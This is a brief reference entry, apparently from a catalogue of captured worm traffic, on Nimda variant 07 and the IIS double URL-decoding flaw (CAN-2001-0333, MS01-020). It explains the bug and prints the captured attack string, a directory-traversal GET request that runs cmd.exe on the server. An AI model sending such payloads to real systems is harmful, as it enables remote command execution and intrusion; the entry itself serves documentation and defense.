Nimda, variant 07


IIS on Windows


CVE: CAN-2001-0333
CERT-Advisory: CA-2001-26
CERT-Vuln: 111677
Microsoft: MS01-020
Bugtraq: 2708


URL decoding error


Remote access


Captured with snort


A URI (RFC 2396) has a limited set of allowed characters. Since this set is smaller than the set of allowable characters in filenames, the standard allows for encoding of special characters with &37; followed by the hex value of the character.

The flaw was that IIS decoded some of the input twice. IIS checks the path for security after the first decoding, but it is the second deconding that controls the file actually accessed.

NSFocus has a good description of the flaw. CERT claims they found the flaw.

Nimda had several other transmission methods not involving web servers.

Nimda had at least 18 variants it used.

Attack string

GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

Attack program source

None available.